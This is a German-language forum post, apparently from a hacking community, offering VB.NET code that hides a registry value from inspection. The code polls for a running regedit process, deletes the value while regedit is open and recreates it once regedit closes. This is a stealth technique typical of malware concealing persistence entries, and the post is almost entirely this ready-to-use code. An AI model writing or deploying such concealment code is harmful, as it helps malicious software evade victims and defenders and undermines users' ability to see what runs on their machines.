Ich hab mich mal ran gesetzt und mir eine Möglichkeit überlegt, wie man einen Registry Key "verstecken" kann. Aufzurufen ist das ganze in einem Thread oder Timer.
Für alle "Flamer": Dieser Code ist 2007 entstanden und nicht ich habe ihn von dem Typ auf HackForums kopiert sondern anders rum..
Funktionsweise:
Überprüft ob der Prozess "regedit" läuft (jaja ich weiß kann man schöner machen)
Wenn ja, löscht er den Key der den übergebenen Parametern entspricht, wenn nicht dann wird der Key erstellt.
mfgCode:Public Enum HKEY ClassesRoot CurrentUser LocalMachine Users CurrentConfig End Enum Public Shared Sub HideValueFromRegistry(ByVal HKEY As HKEY, ByVal SubKey As String, ByVal Name As String, ByVal KeyValue As String) Dim List As New List(Of String) For Each Proc As Process In Process.GetProcesses List.Add(Proc.ProcessName) Next If List.Contains("regedit") Then Select Case HKEY Case HKEY.ClassesRoot Dim Key As RegistryKey = Registry.ClassesRoot.OpenSubKey(SubKey) If Key.GetValue(Name) IsNot Nothing Then My.Computer.Registry.ClassesRoot.OpenSubKey(SubKey, True).DeleteValue(Name) End If Case HKEY.CurrentUser Dim Key As RegistryKey = Registry.CurrentUser.OpenSubKey(SubKey) If Key.GetValue(Name) IsNot Nothing Then My.Computer.Registry.CurrentUser.OpenSubKey(SubKey, True).DeleteValue(Name) End If Case HKEY.LocalMachine Dim Key As RegistryKey = Registry.LocalMachine.OpenSubKey(SubKey) If Key.GetValue(Name) IsNot Nothing Then My.Computer.Registry.LocalMachine.OpenSubKey(SubKey, True).DeleteValue(Name) End If Case HKEY.Users Dim Key As RegistryKey = Registry.Users.OpenSubKey(SubKey) If Key.GetValue(Name) IsNot Nothing Then My.Computer.Registry.Users.OpenSubKey(SubKey, True).DeleteValue(Name) End If Case HKEY.CurrentConfig Dim Key As RegistryKey = Registry.CurrentConfig.OpenSubKey(SubKey) If Key.GetValue(Name) IsNot Nothing Then My.Computer.Registry.CurrentConfig.OpenSubKey(SubKey, True).DeleteValue(Name) End If End Select Else Select Case HKEY Case HKEY.ClassesRoot Dim Key As RegistryKey = Registry.ClassesRoot.OpenSubKey(SubKey) If Key.GetValue(Name) Is Nothing Then My.Computer.Registry.ClassesRoot.OpenSubKey(SubKey, True).SetValue(Name, KeyValue) End If Case HKEY.CurrentUser Dim Key As RegistryKey = Registry.CurrentUser.OpenSubKey(SubKey) If Key.GetValue(Name) Is Nothing Then My.Computer.Registry.CurrentUser.OpenSubKey(SubKey, True).SetValue(Name, KeyValue) End If Case HKEY.LocalMachine Dim Key As RegistryKey = Registry.LocalMachine.OpenSubKey(SubKey) If Key.GetValue(Name) Is Nothing Then My.Computer.Registry.LocalMachine.OpenSubKey(SubKey, True).SetValue(Name, KeyValue) End If Case HKEY.Users Dim Key As RegistryKey = Registry.Users.OpenSubKey(SubKey) If Key.GetValue(Name) Is Nothing Then My.Computer.Registry.Users.OpenSubKey(SubKey, True).SetValue(Name, KeyValue) End If Case HKEY.CurrentConfig Dim Key As RegistryKey = Registry.CurrentConfig.OpenSubKey(SubKey) If Key.GetValue(Name) Is Nothing Then My.Computer.Registry.CurrentConfig.OpenSubKey(SubKey, True).SetValue(Name, KeyValue) End If End Select End If End Sub
nom